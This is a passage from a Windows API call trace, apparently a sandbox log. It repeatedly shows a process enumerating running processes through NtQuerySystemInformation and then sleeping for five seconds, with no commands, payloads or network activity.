FreeType=0x8000) returned 0x0 [0281.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.515] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.533] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.536] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.541] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.626] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.633] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.635] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.650] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.653] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.660] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.663] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.663] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.673] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.679] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.681] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.710] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0281.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0281.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0281.727] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0281.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0281.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0281.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0281.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 